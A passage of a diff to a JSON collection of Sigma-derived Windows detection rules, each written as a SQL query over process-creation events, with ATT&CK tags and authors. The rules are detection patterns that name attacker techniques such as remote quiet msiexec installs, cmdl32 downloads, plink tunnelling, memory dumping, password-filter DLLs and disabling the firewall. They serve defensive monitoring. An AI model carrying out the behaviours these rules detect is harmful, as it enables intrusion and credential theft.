We avoid false positives by excluding all parent process with command line parameters.", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Renamed Sysinternals Sdelete Execution", + "id": "c1d867fe-8d95-4487-aab4-e53f2d339f90", + "status": "experimental", + "description": "Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.impact", + "attack.t1485" ], "falsepositives": [ - "Unknown" + "System administrator usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentCommandLine LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND ParentCommandLine LIKE '%.exe' ESCAPE '\\') AND ((CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%del%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%/C%' ESCAPE '\\' AND CommandLine LIKE '%type nul >%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')) AND CommandLine LIKE '%.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'sdelete.exe' AND NOT ((NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_formbook.yml" + "filename": "proc_creation_win_renamed_sysinternals_sdelete.yml" }, { - "title": "Service Reconnaissance Via Wmic.EXE", - "id": 
"76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "title": "Suspicious Msiexec Quiet Install From Remote Location", + "id": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "status": "experimental", - "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", - "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1047" - ], + "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", + "author": "Nasreddine Bencherchali (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "medium", + "tags": [ + "attack.defense_evasion", + "attack.t1218.007" + ], "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName = 'msiexec.exe') AND (CommandLine LIKE '%/i%' ESCAPE '\\' OR CommandLine LIKE '%-i%' ESCAPE '\\' OR CommandLine LIKE '%/package%' ESCAPE '\\' OR CommandLine LIKE '%-package%' ESCAPE '\\' OR CommandLine LIKE '%/a%' ESCAPE '\\' OR CommandLine LIKE '%-a%' ESCAPE '\\' OR CommandLine LIKE '%/j%' ESCAPE '\\' OR CommandLine LIKE '%-j%' ESCAPE '\\') AND (CommandLine LIKE '%/q%' ESCAPE '\\' OR CommandLine LIKE '%-q%' ESCAPE '\\') AND (CommandLine LIKE '%http%' ESCAPE '\\' OR CommandLine LIKE '%\\\\\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_service.yml" + "filename": 
"proc_creation_win_msiexec_install_remote.yml" }, { - "title": "HackTool - Inveigh Execution", - "id": "b99a1518-1ad5-4f65-bc95-1ffff97a8fd0", + "title": "Renamed CreateDump Utility Execution", + "id": "1a1ed54a-2ba4-4221-94d5-01dee560d71e", "status": "experimental", - "description": "Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects uses of a renamed legitimate createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", + "attack.defense_evasion", + "attack.t1036", "attack.t1003.001" ], "falsepositives": [ - "Very unlikely" + "Command lines that use the same flags" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Inveigh.exe' ESCAPE '\\' OR (OriginalFileName LIKE '\\\\Inveigh.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\Inveigh.dll' ESCAPE '\\') OR Description = 'Inveigh' OR (CommandLine LIKE '% -SpooferIP%' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToIPs %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToDomains %' ESCAPE '\\' OR CommandLine LIKE '% -ReplyToMACs %' ESCAPE '\\' OR CommandLine LIKE '% -SnifferIP%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\' OR (CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -f %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') OR (CommandLine LIKE '% --full %' ESCAPE '\\' AND CommandLine LIKE '% --name %' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_inveigh.yml" + "filename": "proc_creation_win_renamed_createdump.yml" }, { - "title": "MSExchange Transport Agent Installation", - 
"id": "83809e84-4475-4b69-bc3e-4aad8568612f", - "status": "test", - "description": "Detects the Installation of a Exchange Transport Agent", - "author": "Tobias Michalski (Nextron Systems)", + "title": "Suspicious Cmdl32 Execution", + "id": "f37aba28-a9e6-4045-882c-d5004043b337", + "status": "experimental", + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.002" + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" ], "falsepositives": [ - "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Install-TransportAgent%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmdl32.exe' ESCAPE '\\' OR OriginalFileName = 'CMDL32.EXE') AND (CommandLine LIKE '%/vpn %' ESCAPE '\\' AND CommandLine LIKE '%/lan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_msexchange_transport_agent.yml" + "filename": "proc_creation_win_lolbin_cmdl32.yml" }, { - "title": "Suspicious WebDav Client Execution", - "id": "982e9f2d-1a85-4d5b-aea4-31f5e97c6555", + "title": "Disabled RestrictedAdminMode For RDS - ProcCreation", + "id": "28ac00d6-22d9-4a3c-927f-bbd770104573", "status": "experimental", - "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie. 
This could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server) or potentially a sign of exploitation of CVE-2023-23397\n", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detect activation of DisableRestrictedAdmin to desable RestrictedAdmin mode.\nRestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop.\nThis prevents your credentials from being harvested during the initial connection process if the remote server has been compromise\n", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "cve.2023.23397" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\davclnt.dll,DavSetCookie%' ESCAPE '\\' AND CommandLine REGEXP '://\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}') AND NOT (((CommandLine LIKE '%://10.%' ESCAPE '\\' OR CommandLine LIKE '%://192.168.%' ESCAPE '\\' OR CommandLine LIKE '%://172.16.%' ESCAPE '\\' OR CommandLine LIKE '%://172.17.%' ESCAPE '\\' OR CommandLine LIKE '%://172.18.%' ESCAPE '\\' OR CommandLine LIKE '%://172.19.%' ESCAPE '\\' OR CommandLine LIKE '%://172.20.%' ESCAPE '\\' OR CommandLine LIKE '%://172.21.%' ESCAPE '\\' OR CommandLine LIKE '%://172.22.%' ESCAPE '\\' OR CommandLine LIKE '%://172.23.%' ESCAPE '\\' OR CommandLine LIKE '%://172.24.%' ESCAPE '\\' OR CommandLine LIKE '%://172.25.%' ESCAPE '\\' OR CommandLine LIKE '%://172.26.%' ESCAPE '\\' OR CommandLine LIKE '%://172.27.%' ESCAPE '\\' OR CommandLine LIKE '%://172.28.%' ESCAPE '\\' OR CommandLine LIKE '%://172.29.%' ESCAPE '\\' OR CommandLine LIKE '%://172.30.%' ESCAPE '\\' OR CommandLine LIKE 
'%://172.31.%' ESCAPE '\\' OR CommandLine LIKE '%://127.%' ESCAPE '\\' OR CommandLine LIKE '%://169.254.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa\\\\%' ESCAPE '\\' AND CommandLine LIKE '%DisableRestrictedAdmin%' ESCAPE '\\' AND CommandLine LIKE '% 1%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_webdav_client_susp_execution.yml" + "filename": "proc_creation_win_reg_lsa_disable_restricted_admin.yml" }, { - "title": "Suspicious Windows Update Agent Empty Cmdline", - "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "title": "Suspicious File Execution From Internet Hosted WebDav Share", + "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", "status": "experimental", - "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. 
As seen being used in malicious LNK files", + "author": "pH-T (Nextron Systems)", + "tags": [ + "attack.execution", + "attack.t1059.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" + "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" }, { - "title": "HackTool - PPID Spoofing SelectMyParent Tool Execution", - "id": "52ff7941-8211-46f9-84f8-9903efb7077d", - "status": "test", - "description": "Detects the use of parent process ID spoofing tools like Didier Stevens tool SelectMyParent", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Stealing Via Chromium Headless Debugging", + "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", + "status": "experimental", + "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. 
This could be a sign of data stealing or remote control", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1134.004" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SelectMyParent.exe' ESCAPE '\\' OR (CommandLine LIKE '%PPID-spoof%' ESCAPE '\\' OR CommandLine LIKE '%ppid\\_spoof%' ESCAPE '\\' OR CommandLine LIKE '%spoof-ppid%' ESCAPE '\\' OR CommandLine LIKE '%spoof\\_ppid%' ESCAPE '\\' OR CommandLine LIKE '%ppidspoof%' ESCAPE '\\' OR CommandLine LIKE '%spoofppid%' ESCAPE '\\' OR CommandLine LIKE '%spoofedppid%' ESCAPE '\\' OR CommandLine LIKE '% -spawnto %' ESCAPE '\\') OR (OriginalFileName LIKE '%PPID-spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%ppid\\_spoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof-ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoof\\_ppid%' ESCAPE '\\' OR OriginalFileName LIKE '%ppidspoof%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofppid%' ESCAPE '\\' OR OriginalFileName LIKE '%spoofedppid%' ESCAPE '\\') OR Description = 'SelectMyParent' OR Imphash IN ('04d974875bd225f00902b4cad9af3fbc', 'a782af154c9e743ddf3f3eb2b8f3d16e', '89059503d7fbf470e68f7e63313da3ad', 'ca28337632625c8281ab8a130b3d6bad') OR (Hashes LIKE '%IMPHASH=04D974875BD225F00902B4CAD9AF3FBC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=A782AF154C9E743DDF3F3EB2B8F3D16E%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89059503D7FBF470E68F7E63313DA3AD%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=CA28337632625C8281AB8A130B3D6BAD%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_selectmyparent.yml" + "filename": 
"proc_creation_win_browsers_chromium_headless_debugging.yml" }, { - "title": "Service Started/Stopped Via Wmic.EXE", - "id": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "title": "Potential Rundll32 Execution With DLL Stored In ADS", + "id": "9248c7e1-2bf3-4661-a22c-600a8040b446", "status": "experimental", - "description": "Detects usage of wmic to start or stop a service", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", + "author": "Harjot Singh, '@cyb3rjy0t'", "tags": [ - "attack.execution", - "attack.t1047" + "attack.defense_evasion", + "attack.t1564.004" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '% service %' ESCAPE '\\' AND CommandLine LIKE '% call %' ESCAPE '\\' AND (CommandLine LIKE '%stopservice%' ESCAPE '\\' OR CommandLine LIKE '%startservice%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine REGEXP '[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? 
\\S+?\\w:\\S+?:')" ], - "filename": "proc_creation_win_wmic_service_manipulation.yml" + "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml" }, { - "title": "DNS RCE CVE-2020-1350", - "id": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", + "title": "Execution in Outlook Temp Folder", + "id": "a018fdc3-46a3-44e5-9afb-2cd4af1d4b39", "status": "test", - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", + "description": "Detects a suspicious program execution in Outlook temp folder", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" + "attack.t1566.001" ], "falsepositives": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ParentProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE '%\\\\System32\\\\werfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dnscmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_cve_2020_1350.yml" + "filename": "proc_creation_win_office_outlook_execution_from_temp.yml" }, { - "title": "Renamed Jusched.EXE Execution", - "id": "edd8a48c-1b9f-4ba1-83aa-490338cd1ccb", + "title": "Suspicious Hacktool Execution - PE Metadata", + "id": "37c1333a-a0db-48be-b64b-7393b2386e3b", + "status": "experimental", + "description": "Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) 
even if the files have been renamed", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Company = 'Cube0x0')" + ], + "filename": "proc_creation_win_hktl_execution_via_pe_metadata.yml" + }, + { + "title": "Dropping Of Password Filter DLL", + "id": "b7966f4a-b333-455b-8370-8ca53c229762", "status": "test", - "description": "Detects the execution of a renamed \"jusched.exe\" as seen used by the cobalt group", - "author": "Markus Neis, Swisscom", + "description": "Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS", + "author": "Sreeman", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1036.003" + "attack.credential_access", + "attack.t1556.002" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Description IN ('Java Update Scheduler', 'Java(TM) Update Scheduler') AND NOT (NewProcessName LIKE '%\\\\jusched.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\Lsa%' ESCAPE '\\' AND CommandLine LIKE '%scecli\\\\0%' ESCAPE '\\' AND CommandLine LIKE '%reg add%' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_jusched.yml" + "filename": "proc_creation_win_reg_credential_access_via_password_filter.yml" }, { - "title": "File Decoded From Base64/Hex Via Certutil.EXE", - "id": "cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7", + "title": "Exploiting SetupComplete.cmd CVE-2019-1378", + "id": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", "status": "test", - "description": "Detects the execution of certutil with either the \"decode\" or \"decodehex\" flags to decode base64 or hex encoded files. 
This can be abused by attackers to decode an encoded payload before execution", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", + "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1068", + "attack.execution", + "attack.t1059.003", + "attack.t1574", + "cve.2019.1378" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-decode %' ESCAPE '\\' OR CommandLine LIKE '%/decode %' ESCAPE '\\' OR CommandLine LIKE '%-decodehex %' ESCAPE '\\' OR CommandLine LIKE '%/decodehex %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentCommandLine LIKE '%\\\\cmd.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%/c%' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows\\\\Setup\\\\Scripts\\\\%' ESCAPE '\\' AND (ParentCommandLine LIKE '%SetupComplete.cmd' ESCAPE '\\' OR ParentCommandLine LIKE '%PartnerSetupComplete.cmd' ESCAPE '\\')) AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Setup\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_certutil_decode.yml" + "filename": "proc_creation_win_exploit_cve_2019_1378.yml" }, { - "title": "Rundll32 With Suspicious Parent Process", - "id": "1723e720-616d-4ddc-ab02-f7e3685a4713", - "status": "experimental", - "description": "Detects suspicious start 
of rundll32.exe with a parent process of Explorer.exe. Variant of Raspberry Robin, as first reported by Red Canary.", - "author": "CD_ROM_", + "title": "Potential RDP Tunneling Via SSH Plink", + "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "status": "test", + "description": "Execution of plink to perform data exfiltration and tunneling", + "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.command_and_control", + "attack.t1572" + ], + "falsepositives": [ + "Administrative activity" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + ], + "filename": "proc_creation_win_plink_susp_tunneling.yml" + }, + { + "title": "Suspicious Scheduled Task Creation Involving Temp Folder", + "id": "39019a4e-317f-4ce3-ae63-309a8c6b53c5", + "status": "test", + "description": "Detects the creation of scheduled tasks that involves a temporary folder and runs only once", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.persistence", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Administrative activity", + "Software installation" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '% -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND CommandLine LIKE '% /sc once %' ESCAPE '\\' AND CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_parent_explorer.yml" + "filename": "proc_creation_win_schtasks_creation_temp_folder.yml" }, { - "title": "Filter Driver Unloaded Via Fltmc.EXE", - "id": "4931188c-178e-4ee7-a348-39e8a7a56821", + "title": "Firewall Disabled via Netsh.EXE", + "id": "57c4bf16-227f-4394-8ec7-1b745ee061c3", "status": "test", - "description": "Detect filter driver unloading activity via fltmc.exe", - "author": "Nasreddine Bencherchali", + "description": "Detects netsh commands that turns off the Windows firewall", + "author": "Fatih Sirin", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562", - "attack.t1562.002" + "attack.t1562.004", + "attack.s0108" ], "falsepositives": [ - "Unknown" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\fltMC.exe' ESCAPE '\\' OR OriginalFileName = 'fltMC.exe') AND CommandLine LIKE '%unload%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%unload rtp\\_filesystem\\_filter' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND ((CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%opmode%' ESCAPE '\\' AND CommandLine LIKE '%disable%' ESCAPE '\\') OR (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%state%' ESCAPE '\\' AND CommandLine LIKE '%off%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_fltmc_unload_driver.yml" + "filename": "proc_creation_win_netsh_fw_disable.yml" }, { - "title": "Curl.EXE Execution With Custom 
UserAgent", - "id": "3286d37a-00fd-41c2-a624-a672dcd34e60", + "title": "Suspicious Calculator Usage", + "id": "737e618a-a410-49b5-bec3-9e55ff7fbc15", "status": "test", - "description": "Detects execution of curl.exe with custom useragent options", - "author": "frack113", + "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1071.001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND (CommandLine LIKE '% -A %' ESCAPE '\\' OR CommandLine LIKE '% --user-agent %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%\\\\calc.exe %' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_curl_useragent.yml" + "filename": "proc_creation_win_susp_calc.yml" }, { - "title": "WhoAmI as Parameter", - "id": "e9142d84-fbe0-401d-ac50-3e519fb00c89", + "title": "Suspicious Rundll32 Invoking Inline VBScript", + "id": "1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd", "status": "test", - "description": "Detects a suspicious process command line that uses whoami as first parameter (as e.g. 
used by EfsPotato)", + "description": "Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%.exe whoami%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%Execute%' ESCAPE '\\' AND CommandLine LIKE '%RegRead%' ESCAPE '\\' AND CommandLine LIKE '%window.close%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_whoami_as_param.yml" + "filename": "proc_creation_win_rundll32_inline_vbs.yml" }, { - "title": "Read Contents From Stdin Via Cmd.EXE", - "id": "241e802a-b65e-484f-88cd-c2dc10f9206d", + "title": "Suspicious Sysmon as Execution Parent", + "id": 